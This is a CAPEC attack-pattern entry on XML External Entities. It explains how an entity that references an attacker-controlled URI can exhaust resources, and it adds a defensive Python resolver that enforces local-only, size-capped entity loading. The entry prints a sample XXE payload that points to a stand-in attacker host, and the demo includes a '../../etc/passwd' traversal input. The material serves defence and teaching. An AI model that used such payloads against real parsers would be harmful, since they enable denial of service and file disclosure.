CAPEC List (Version 2.11)

CAPEC-221: XML External Entities

Attack Pattern ID: 221
Abstraction: Standard
Status: Draft
Completeness: Stub
+ Summary

This attack takes advantage of the entity replacement property of XML where the value of the replacement is a URI. A well-crafted XML document could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.

+ Attack Prerequisites
  • A server that has an implementation that accepts entities containing URI values.

+ Examples-Instances

In this example, the XML parser parses the attacker's XML and opens the malicious URI. The attacker controls the server behind that URI and writes a massive amount of data to the response stream, so the malicious URI amounts to a large file transfer.

<?xml version="1.0"?>
<!DOCTYPE bomb [
  <!-- external general entity whose replacement text is fetched from the attacker's URI -->
  <!ENTITY detonate SYSTEM "http://www.malicious-badguy.com/myhugefile.exe">
]>
<bomb>&detonate;</bomb>

+ Solutions and Mitigations

This attack may be mitigated by configuring the XML parser not to resolve external entities at all. If external entities are needed, implement a custom XmlResolver that enforces a request timeout and a data retrieval limit and restricts which local resources it is allowed to retrieve.
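A resolver enforcing the restrictions just listed, written here in Python against the standard-library expat API as an added example (not code from this CAPEC entry or from any product's XmlResolver). Names such as parse_untrusted, MAX_ENTITY_BYTES and the sample entity file are this example's own; network URIs are refused outright rather than fetched with a timeout, so the example runs offline.

```python
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse

MAX_ENTITY_BYTES = 64 * 1024  # data retrieval limit per external entity
class EntityPolicyError(Exception):
    """An external entity reference violated the resolver policy."""

def parse_untrusted(xml_text, allowed_dir):
    """Parse untrusted XML, serving external entities only from allowed_dir; returns its character data."""
    allowed_dir = os.path.realpath(allowed_dir)
    chunks, parser = [], expat.ParserCreate()
    def resolve(context, base, system_id, public_id):
        url = urlparse(system_id)
        # 1. Never fetch from the network: only bare paths and file: URIs qualify.
        if url.scheme not in ("", "file"):
            raise EntityPolicyError(f"remote entity refused: {system_id}")
        # 2. The target must stay inside allowed_dir (realpath defeats ../ tricks).
        path = os.path.realpath(os.path.join(allowed_dir, url.path))
        if os.path.commonpath([allowed_dir, path]) != allowed_dir:
            raise EntityPolicyError(f"path outside allowed directory: {system_id}")
        # 3. Cap the data pulled in for one entity before reading any of it.
        if os.path.getsize(path) > MAX_ENTITY_BYTES:
            raise EntityPolicyError(f"entity too large: {system_id}")
        # Vetted content is expanded in place through expat's sub-parser API.
        with open(path, "rb") as f:
            parser.ExternalEntityParserCreate(context).Parse(f.read(MAX_ENTITY_BYTES), True)
        return 1  # non-zero tells expat the reference was handled

    parser.ExternalEntityRefHandler = resolve
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text, True)
    return "".join(chunks)

def _outcome(uri, allowed):
    doc = f'<!DOCTYPE bomb [<!ENTITY detonate SYSTEM "{uri}">]><bomb>&detonate;</bomb>'
    try:
        return parse_untrusted(doc, allowed)
    except EntityPolicyError:
        return "refused"

def demo():
    allowed = tempfile.mkdtemp()  # constructed allowed directory holding one 5-byte entity
    with open(os.path.join(allowed, "allowed.txt"), "wb") as f:
        f.write(b"hello")
    return {name: _outcome(uri, allowed) for name, uri in [  # constructed cases
        ("local", "allowed.txt"), ("traversal", "../../etc/passwd"),
        ("remote", "http://www.malicious-badguy.com/myhugefile.exe")]}
```

A policy violation surfaces as EntityPolicyError raised out of Parse, so the caller can log the offending system identifier before discarding the document.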

+ Content History
  • CAPEC Content Team, The MITRE Corporation, 2014-06-23, Internal_CAPEC_Team
  • CAPEC Content Team, The MITRE Corporation, 2017-08-04, Updated Related_Attack_Patterns, Internal

Page Last Updated or Reviewed: August 04, 2017